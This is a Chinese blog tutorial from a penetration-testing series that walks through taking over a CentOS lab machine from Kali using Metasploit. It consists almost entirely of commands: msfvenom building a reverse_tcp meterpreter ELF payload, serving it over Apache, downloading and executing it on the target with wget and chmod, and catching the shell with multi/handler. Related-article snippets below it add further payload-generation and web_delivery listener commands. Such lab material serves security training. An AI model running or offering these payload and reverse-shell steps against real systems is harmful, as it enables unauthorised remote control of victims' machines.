客户端渗透之——使用Metasploit实现对Linux客户端的渗透

最新推荐文章于 2024-08-19 19:20:19 发布

冰河

最新推荐文章于 2024-08-19 19:20:19 发布

阅读量6.7k

点赞数 1

分类专栏：精通渗透系列文章标签：渗透 Metasploit

本文链接：https://blog.csdn.net/l1028386804/article/details/86633254

版权

精通渗透系列专栏收录该内容

145 篇文章 307 订阅

订阅专栏

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86633254

攻击机 Kali 192.168.175.128

靶机 CentOS 6.5 192.168.175.132

1.生成elf文件

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.175.128 LPORT=5555 -f elf > /var/www/html/pay.elf

这里，我们将生成的pay.elf文件保存到了/var/www/html/目录下。

2.启动apache服务器

service apache2 start

3.在靶机上下载pay.elf

这里，假设我们经过一系列的渗透取得了靶机的权限，在靶机上执行如下命令

wget http://192.168.175.128/pay.elf
chmod a+x pay.elf
./pay.elf

4.在攻击机上执行攻击操作

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
setg LHOST 192.168.175.128
setg LPORT 5555
exploit

这样，我们就可以获取目标服务器的Meterpreter了。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

冰河

关注关注

1
点赞
踩
11

收藏

觉得还不错? 一键收藏
打赏
3
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

2021-08-29 网安实验-Linux系统渗透测试之Metasploit攻击linux实例

时光隧道

08-29

8万+

一：扫描端口 nmap -sT -v 10.1.1.136 扫描漏洞主机开放端口信息，扫描结果如下：其中6667号端口开放IRC服务，可以利用UnrealIRCD IRC软件的漏洞来攻击漏洞主机。二：UnrealIRCd后门漏洞 1.输入msfconsole命令 2.运行“search unrealircd”命令 3.运行“use exploit/unix/irc/unreal_ircd_3281_backdoor”命令开始运行EXP 4.使用“show options“ 命令查看该expl

Kali-linux使用Metasploit基础

2301_77162959的博客

05-16

1003

Metasploit是一款开源的安全漏洞检测工具。它可以帮助用户识别安全问题，验证漏洞的缓解措施，并对某些软件进行安全性评估，提供真正的安全风险情报。当用户第一次接触Metasploit渗透测试框架软件（MSF）时，可能会被它提供如此多的接口、选项、变量和模块所震撼，而感觉无所适从。Metasploit软件为它的基础功能提供了多个用户接口，包括终端、命令行和图形化界面等。本节将介绍Metasploit下各种接口的使用方法。

3 条评论您还未登录，请先登录后发表或查看评论

Metasploit攻击linux实例

jjxsir的博客

12-28

3253

一、实验目的通过该实验了解Metasploit的基本框架，掌握metasploit攻击操作系统的一般方法二、实验环境漏洞主机：linux, IP 地址：10.1.1.136 攻击主机：Kali linux, IP地址：10.1.1.141 三、实验内容与实验要求初步了解实验环境及漏洞信息搜集利用UnrealIRCd后门漏洞攻击漏洞主机利用Distcc后门漏洞攻击Metasploitable2漏洞主机 Distcc后门漏洞四、实验过程与分析查看Metasploitable2漏洞主机的登录用户

Metasploit漏洞利用系列（六）：MSF渗透测试 - 利用Samba服务漏洞入侵Linux主机实战

最新发布

2402_86373248的博客

08-19

525

在本系列的第六篇文章中，我们将深入探究如何利用Metasploit Framework (MSF) 针对Samba服务存在的漏洞进行Linux主机的渗透测试。1. 搭建测试环境：在虚拟化环境中部署一个具有Samba服务的Linux主机，确保其版本包含已知漏洞，例如早期的Samba 3.x或4.x版本。通过Samba服务的漏洞，发送恶意数据包至目标主机，触发漏洞利用，一旦成功，将在Metasploit控制台上获得一个Meterpreter会话。根据识别到的Samba版本，选择相应的漏洞利用模块。

Metasploit渗透Ubuntu 12.04攻击测试演练

test_20140325的专栏

11-26

1438

转载FreeBuf.COM 这篇文章写来主要是一次娱乐性的练习。共享出攻击的细节，其中包括一些经过原作者修改过的各种来源的脚本文件。渗透的过程不是重点，之所以发出来最大的原因主要是文章后半部分维持持久化攻击的一些地方还是很值得学习的，顺便大家也可以再次熟悉一下MSF框架。希望对大家有所帮助。攻击环境： Ubuntu12.04LTS 32bit（靶机，默认的软件安装配置） V

视频教程-Kali Linux渗透测试实战：Msfvenom木马生成与攻防实战教程-渗透测试

weixin_33393229的博客

05-28

542

Kali Linux渗透测试实战：Msfvenom木马生成与攻防实战教程本...

E017-渗透测试常用工具-使用Beef对客户端浏览器进行劫持.pdf

12-02

在本课程中，我们将学习如何使用Beef与Metasploit框架协同工作，以实现对目标客户端的攻击。首先，我们需要准备一个渗透测试环境，包括Kali Linux（作为渗透机）和多个Windows服务器及客户端。确保所有机器之间的...

Kali linux 学习笔记（九十六）metasploit framework——客户端渗透 2020.4.28

闵行小鱼塘

04-28

870

本节学习客户端渗透

【渗透测试】Metasploit从入门到精通（1）

m0_70746078的博客

09-25

1724

渗透测试是一种有目的性的、针对目标机构计算机系统安全的检测评估方法。渗透测试可以发现系统的漏洞和安全机制方面的隐患，并以此进行渗透攻击来取得目标计算机的控制权。通过渗透测试可以知道目标机构的计算机系统是否易于受到攻击，现有的安全部署是否能妥善地抵御攻击，以及哪部分安全机制可能被绕过，等等。渗透测试的主要目的是改善目标机构的安全性。

渗透测试 ( 3 ) --- Metasploit Framework ( MSF )

墨鱼菜鸡

07-11

4495

白嫖 Metasploit Pro 2022：https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022：http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro：https://www.52pojie.cn/thr...

《Kali Linux高级渗透测试原书第2版》网络渗透测试技术书无线网络渗透测试详解黑客攻击与防范实战从入门到精通书

程序员白楠楠的博客

10-08

3067

内容简介： KaliLinux面向专业的渗透测试和审计，集成了大量挑选的检测工具。本书在KaliLinux平台上从一个攻击者的角度来审视网络框架，详细介绍了攻击者“杀链”采取的具体步骤。通过阅读本书读者能学习并掌握渗透测试方法和工具。《Kali Linux高级渗透测试原书第2版》目录： 1章基于目标的渗透测试 1 1.1 安全测试的概念 1 1.2 经典漏洞扫描、渗透测试和红队练习的失败 2 1.3 测试方法 2 1.4 Kali Linux介绍——历史和目的 4 1.5 安...

msf制作Linux恶意软件获取shell

Deeeelete的博客

02-26

746

1.生成linux可执行文件 msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.132.144 LPORT=4444 -b "\x00" -i 10 -f elf -o /var/www/html/clownclown 2.配置监听 3.拖进系统 4.赋予权限 5.运行 ...

Metasploit安装及使用教程（非常详细）从零基础入门到精通，看完这一篇就够了。

ZL_1618的博客

06-14

2563

通过本篇文章，我们将会学习以下内容：1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令。

【Metasploit】Metasploit安装及使用教程（非常详细）从零基础入门到精通，看完这一篇就够了。

A1_3_9_7的博客

02-27

1989

Metasploit是目前世界上领先的渗透测试工具，也是信息安全与渗透测试领域最大的开源项目之一。它彻底改变了我们执行安全测试的方式。Metasploit之所以流行，是因为它可以执行广泛的安全测试任务，从而简化渗透测试的工作。Metasploit 适用于所有流行的操作系统，本文中，主要以Kali Linux为主。因为Kali Linux预装了 Metasploit 框架和运行在框架上的其他第三方工具。

Centos Linux下使用Metasploit渗透android，字节跳动面试官

2401_83947255的博客

03-29

644

本文讲解了我对Android开发现状的一些看法，也许有些人会觉得我的观点不对，但我认为没有绝对的对与错，一切交给时间去证明吧！愿与各位坚守的同胞们互相学习，共同进步！V获取：vip204888 （备注Android）**[外链图片转存中…(img-2nXFq0IU-1711641818984)]本文讲解了我对Android开发现状的一些看法，也许有些人会觉得我的观点不对，但我认为没有绝对的对与错，一切交给时间去证明吧！愿与各位坚守的同胞们互相学习，共同进步！本文已被。

Kali Linux渗透测试实战：Msfvenom木马生成与攻防实战教程

08-19

1、课程概要本课程主要分享Kali Linux渗透测试实战：Msfvenom生成木马攻防实战教程！ 2、课程目标本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧！ 3、适合人员本课程适合兴趣计算机与网络安全技术的学员观看学习！ 4、特别说明本课程支持一次购买，永久观看，请广大学员们放心选购！

上线MSF(Metasploit)的几种常见方式

qq_46258964的博客

04-14

9531

powershell上线利用powershell上线msf 对应模块use exploit/multi/script/web_delivery use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 172.16.1.10 set lport 6666 run 复制对应的powershell代码到Windows主机中执行便可以上线msf m

MSF模拟渗透测试攻击linux实例

lza20001103的博客

04-09

9481

MSF模拟渗透测试攻击linux实例

内网渗透工具MSF使用教程

CC__Faker的博客

04-01

2674

MSF介绍 Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。常见指令 use[exploits/payloads/auxiliary] //指定一个模块并使其开始工作 show[exploits/payloads/auxiliary/options] //显

metasploit对客户端渗透概述

04-28

Metasploit是一款流行的开源渗透测试框架，可以用来测试网络系统的安全性。Metasploit提供了多种攻击模块，包括针对客户端的渗透攻击模块。对客户端的渗透攻击通常涉及到利用已知的漏洞或者社会工程学手段，来获取目标系统的访问权限。这些攻击可以通过Metasploit框架中的多种模块来实现，例如： 1. Exploit模块：可以利用已知的漏洞来攻击客户端系统，获取管理员权限或者远程执行代码。 2. Payload模块：可以在攻击成功后，在目标系统上执行各种操作，例如远程访问、文件上传、数据下载等。 3. Social Engineering模块：可以利用社会工程学手段来欺骗用户，例如通过钓鱼邮件或者伪装成合法的软件更新程序来诱骗用户执行恶意代码。总之，Metasploit框架提供了强大的工具和模块，可以帮助安全测试人员和渗透测试人员快速、准确地评估客户端系统的安全性，并且可以帮助企业发现和修复潜在的安全漏洞。